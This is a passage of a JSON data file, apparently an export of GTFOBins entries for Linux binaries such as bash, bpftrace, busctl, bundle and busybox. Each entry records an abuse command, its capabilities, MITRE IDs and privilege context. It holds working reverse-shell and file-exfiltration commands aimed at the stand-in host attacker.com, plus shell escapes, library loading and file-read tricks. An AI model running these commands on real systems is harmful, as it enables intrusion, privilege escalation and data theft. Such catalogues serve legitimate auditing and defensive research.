-c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -p -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bashbug:inherit:0:sudo","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bashbug/"]},{"id":"gtfo:bashbug:inherit:0:unprivileged","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bashbug/"]},{"id":"gtfo:batcat:inherit:0:sudo","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:batcat:inherit:0:suid","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:batcat:inherit:0:unprivileged","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:bbot:file-read:0:sudo","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bbot/"]},{"id":"gtfo:bbot:file-read:0:unprivileged","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bbot/"]},{"id":"gtfo:bc:file-read:0:sudo","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bc:file-read:0:suid","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bc:file-read:0:unprivileged","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bconsole:file-read:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:file-read:0:suid","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:file-read:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:shell:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:shell:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bee:inherit:0:sudo","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:bee:inherit:0:suid","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:bee:inherit:0:unprivileged","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:borg:shell:0:sudo","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/borg/"]},{"id":"gtfo:borg:shell:0:unprivileged","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/borg/"]},{"id":"gtfo:bpftrace:shell:0:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace --unsafe -e 'BEGIN {system(\"/bin/sh 1<&0\");exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bpftrace:shell:1:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'BEGIN {system(\"/bin/sh 1<&0\");exit()}' >/path/to/temp-file\nbpftrace --unsafe /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bpftrace:shell:2:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace -c /bin/sh -e 'END {exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bridge:file-read:0:sudo","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bridge:file-read:0:suid","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bridge:file-read:0:unprivileged","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bundle:inherit:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:2:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:2:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:busctl:inherit:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:inherit:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:inherit:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busybox:inherit:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Execution"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:1:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:1:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:reverse-shell:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:reverse-shell:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:upload:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:upload:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:byebug:inherit:0:sudo","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/byebug/"]},{"id":"gtfo:byebug:inherit:0:unprivileged","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop 